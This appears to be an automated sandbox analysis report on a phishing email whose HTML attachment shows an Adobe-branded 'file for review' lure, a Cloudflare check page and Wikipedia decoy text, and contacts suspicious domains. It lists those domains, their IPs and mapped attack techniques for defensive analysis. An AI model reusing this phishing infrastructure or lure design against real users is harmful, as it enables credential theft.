    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20241008T0748420045-7024.etl
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\phish_alert_sp2_2.0.0.0.eml"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D344D994-EE2F-4A00-9D9F-9EE0EA25E9D6" "57595C43-C7DC-4AA9-ADCB-EBC4A2124A79" "7024" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IZMN0LFD\Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,10352928630655094259,13753120291753910830,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "D344D994-EE2F-4A00-9D9F-9EE0EA25E9D6" "57595C43-C7DC-4AA9-ADCB-EBC4A2124A79" "7024" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IZMN0LFD\Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1972,i,10352928630655094259,13753120291753910830,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
    Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    DLL Side-Loading
    1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    1
    Process Injection
    LSASS Memory1
    File and Directory Discovery
    Remote Desktop ProtocolData from Removable Media1
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    Registry Run Keys / Startup Folder
    1
    DLL Side-Loading
    Security Account Manager12
    System Information Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
    Extra Window Memory Injection
    1
    Extra Window Memory Injection
    NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    fvi5np.tgardtorveni.com
    104.21.10.69
    truefalse
      unknown
      code.jquery.com
      151.101.66.137
      truefalse
        unknown
        me-ycpi-cf-www.g06.yahoodns.net
        87.248.119.252
        truefalse
          unknown
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            unknown
            40lzzyxj.banquetesaraucania.cc
            188.114.97.3
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                unknown
                xmymbshctq0yrufobyi4rhh5pb7rbmlpbry0hnlxy2jafbrmj5sr4upab4a.tubeawelm.ru
                104.21.34.46
                truefalse
                  unknown
                  www.google.com
                  172.217.18.4
                  truefalse
                    unknown
                    upload.wikimedia.org
                    185.15.59.240
                    truefalse
                      unknown
                      dyna.wikimedia.org
                      185.15.59.224
                      truefalse
                        unknown
                        yahoo.com
                        98.137.11.164
                        truefalse
                          unknown
                          media-router-brb1.prod.media.g03.yahoodns.net
                          188.125.72.139
                          truefalse
                            unknown
                            login.wikimedia.org
                            unknown
                            unknownfalse
                              unknown
                              csp.yahoo.com
                              unknown
                              unknownfalse
                                unknown
                                www.yahoo.com
                                unknown
                                unknownfalse
                                  unknown
                                  en.wikipedia.org
                                  unknown
                                  unknownfalse
                                    unknown
                                    meta.wikimedia.org
                                    unknown
                                    unknownfalse
                                      unknown
                                      NameMaliciousAntivirus DetectionReputation
                                      file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.htmlfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.18.94.41
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        52.182.143.214
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        185.15.59.224
                                        dyna.wikimedia.orgNetherlands
                                        14907WIKIMEDIAUSfalse
                                        87.248.119.252
                                        me-ycpi-cf-www.g06.yahoodns.netUnited Kingdom
                                        203220YAHOO-DEBDEfalse
                                        104.21.34.46
                                        xmymbshctq0yrufobyi4rhh5pb7rbmlpbry0hnlxy2jafbrmj5sr4upab4a.tubeawelm.ruUnited States
                                        13335CLOUDFLARENETUSfalse
                                        185.15.59.240
                                        upload.wikimedia.orgNetherlands
                                        14907WIKIMEDIAUSfalse
                                        151.101.66.137
                                        code.jquery.comUnited States
                                        54113FASTLYUSfalse
                                        142.250.186.99
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        52.113.194.132
                                        unknownUnited States
                                        8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.17.24.14
                                        cdnjs.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        172.217.16.202
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        1.1.1.1
                                        unknownAustralia
                                        13335CLOUDFLARENETUSfalse
                                        74.125.133.84
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        172.217.18.4
                                        www.google.comUnited States
                                        15169GOOGLEUSfalse
                                        104.18.95.41
                                        challenges.cloudflare.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        151.101.2.137
                                        unknownUnited States
                                        54113FASTLYUSfalse
                                        188.125.72.139
                                        media-router-brb1.prod.media.g03.yahoodns.netUnited Kingdom
                                        34010YAHOO-IRDGBfalse
                                        104.21.10.69
                                        fvi5np.tgardtorveni.comUnited States
                                        13335CLOUDFLARENETUSfalse
                                        239.255.255.250
                                        unknownReserved
                                        unknownunknownfalse
                                        188.114.97.3
                                        40lzzyxj.banquetesaraucania.ccEuropean Union
                                        13335CLOUDFLARENETUSfalse
                                        142.250.186.142
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        142.250.184.238
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        172.217.16.195
                                        unknownUnited States
                                        15169GOOGLEUSfalse
                                        52.109.76.144
                                        unknownUnited States
                                        8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                        104.17.25.14
                                        unknownUnited States
                                        13335CLOUDFLARENETUSfalse
                                        98.137.11.164
                                        yahoo.comUnited States
                                        36647YAHOO-GQ1USfalse
                                        IP
                                        192.168.2.16
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1528941
                                        Start date and time:2024-10-08 13:48:09 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Sample name:phish_alert_sp2_2.0.0.0.eml
                                        Detection:MAL
                                        Classification:mal48.phis.winEML@24/90@42/206
                                        Cookbook Comments:
                                        • Found application associated with file extension: .eml
                                        • Exclude process from analysis (whitelisted): dllhost.exe
                                        • Excluded IPs from analysis (whitelisted): 52.113.194.132, 52.109.76.144, 142.250.186.99, 74.125.133.84, 142.250.186.142, 34.104.35.123, 40.69.42.241, 52.182.143.214, 172.217.16.202, 142.250.185.202, 142.250.184.202, 216.58.206.74, 142.250.186.138, 142.250.185.106, 142.250.185.170, 216.58.206.42, 142.250.186.170, 172.217.23.106, 142.250.185.234, 216.58.212.138, 172.217.18.106, 142.250.186.106, 172.217.18.10, 142.250.185.74
                                        • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, neu-azsc-000.odc.officeapps.live.com, odc.officeapps.live.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, clientservices.googleapis.com, s-0005-office.config.skype.com, mobile.events.data.microsoft.com, ecs-office.s-0005.s-msedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, s-0005.s-msedge.net, glb.cws.prod.dcat.dsp.trafficmanager.net, onedscolprdcus19.centralus.cloudapp.azure.com, ecs.office.trafficmanager.net, clients.l.google.com, prod.odcsm1.live.com.akadns.net, mobile.events.data.trafficmanager.net, osiprod-neu-bronze-azsc-000.northeurope.cloudapp.azure.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetValueKey calls found.
                                        • VT rate limit hit for: 40lzzyxj.banquetesaraucania.cc
                                        InputOutput
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        {
                                        "brand":["Adobe"],
                                        "contains_trigger_text":true,
                                        "trigger_text":"YOU'VE A FILE FOR REVIEW!",
                                        "prominent_button_name":"unknown",
                                        "text_input_field_labels":"unknown",
                                        "pdf_icon_visible":false,
                                        "has_visible_captcha":false,
                                        "has_urgent_text":false,
                                        "text":"YOUR DOCUMENT READY YOU'VE A FILE FOR REVIEW Number of Images: 2 Attachment F Status: Delivered Successfully Device Location: Xerox C",
                                        "has_visible_qrcode":false}
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        "{
                                           \"brand\": [\"Wikipedia\"],
                                           \"contains_trigger_text\": false,
                                           \"trigger_text\": \"\",
                                           \"prominent_button_name\": \"unknown\",
                                           \"text_input_field_labels\": \"unknown\",
                                           \"pdf_icon_visible\": false,
                                           \"has_visible_captcha\": false,
                                           \"has_urgent_text\": false,
                                           \"text\": \"Human rights are moral principles or norms[1] that establish standards of human behaviour and are regularly protected as substantive rights in municipal and international law.[2] They are commonly understood as inalienable,
                                        [3] fundamental rights \"to which a person is inherently entitled simply because he or she is a human being\"[4] and which are \"inherent in all human beings\"[5] regardless of age,
                                         ethnic origin,
                                         location,
                                         language,
                                         religion,
                                         ethnicity,
                                         or any other status.[3] They are applicable everywhere and at all times in the sense of being universal,
                                        [1] and they are egalitarian in the sense of being the same for everyone.[3] They are regarded as requiring empathy and the rule of law,
                                        [6] and imposing an obligation on individuals to respect the human rights of others.[1][3] it is generally considered that they should not be taken away except as a result of due process based on specific circumstances.[3] The doctrine of human rights has been highly influential within international law and global and regional institutions.[3] The precise meaning of the term right is controversial and remains the subject of ongoing philosophical debate.[7] While there is consensus that human rights encompass a wide variety of rights,
                                        [5] such as the right to a fair trial,
                                         protection against enslavement,
                                         prohibition of genocide,
                                         free speech,
                                        [8] and the right to education,
                                         there is disagreement about which of these rights are universal and inalienable,
                                         and how they should be implemented. The concept of human rights is based on the idea that all individuals have inherent dignity and worth,
                                         and that they are entitled to certain basic rights and freedoms. These rights include the right to life,
                                         liberty,
                                         and security of person; freedom from torture and cruel,
                                         inhuman,
                                         or degrading treatment; freedom from slavery and servitude; freedom from arbitrary arrest and detention; the right to a fair trial; the right to freedom of thought,
                                         conscience,
                                         and religion; the right to freedom of expression; the right to freedom of assembly and association; the right to work; the right to an adequate standard of living; the right to education; and the right to participate in th}
                                        "
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        "{
                                           \"brand\": [\"Wikipedia\"],
                                           \"contains_trigger_text\": false,
                                           \"trigger_text\": \"\",
                                           \"prominent_button_name\": \"unknown\",
                                           \"text_input_field_labels\": \"unknown\",
                                           \"pdf_icon_visible\": false,
                                           \"has_visible_captcha\": false,
                                           \"has_urgent_text\": false,
                                           \"text\": \"Human rights Article Talk Read From Wikipedia,
                                         the free encyclopedia For other uses,
                                         see Human rights (disambiguation). Human rights are moral principles or norms[1] that establish standards of human behaviour and are regularly protected as substantive rights in municipal and international law.[2] They are commonly understood as inalienable,
                                        [3] fundamental rights \"to which a person is inherently entitled simply because he or she is a human being\"[4] and which are \"inherent in all human beings\",
                                        [5] regardless of age,
                                         ethnic origin,
                                         location,
                                         language,
                                         religion,
                                         ethnicity,
                                         or any other status.[3] They are applicable everywhere and at all times in the sense of being universal,
                                        [1] and they are egalitarian in the sense of being the same for everyone.[3] They are regarded as requiring empathy and the rule of law,
                                        [6] and imposing an obligation on individuals to respect the human rights of others.[1][3] it is generally considered that they should not be taken away except as a result of due process based on specific circumstances.[3] The doctrine of human rights has been highly influential within international law and global and regional institutions.[3] The precise meaning of the term right is controversial and remains the subject of ongoing philosophical debate.[7] While there is consensus that human rights encompass a wide variety of rights,
                                        [5] such as the right to a fair trial,
                                         protection against enslavement,
                                         prohibition of genocide,
                                         free speech,
                                        [8] and the right to education,
                                         there is disagreement about which of these Magna Carta or \"Great Charter\" was one of the world's first documents containing commitments by a sovereign to his people to respect certain legal rights. Theoretical distinctions Claim rights and liberty rights Individual and group rights Natural rights and legal rights Negative and positive rights Human rights Civil and political Economic,
                                         social and cultural Three generations Rights by beneficiary Theoretical distinctions Claim rights and liberty rights Individual and group rights Natural rights and legal rights Negative and positive rights Human rights Civil and political Economic,
                                         social and cultural Three generations Rights by beneficiary\" }
                                        "
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        {
                                        "brand":["Cloudflare"],
                                        "contains_trigger_text":true,
                                        "trigger_text":"Running checks to verify your browser's security features.",
                                        "prominent_button_name":"unknown",
                                        "text_input_field_labels":"unknown",
                                        "pdf_icon_visible":false,
                                        "has_visible_captcha":false,
                                        "has_urgent_text":false,
                                        "text":"Verifying... Running checks to verify your browser's security features.",
                                        "has_visible_qrcode":false}
                                        URL: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/IZMN0LFD/Gms-worldwide.com_reff_718221024510_JdPQby1N0i.html Model: jbxai
                                        {
                                        "brand":["Cloudflare"],
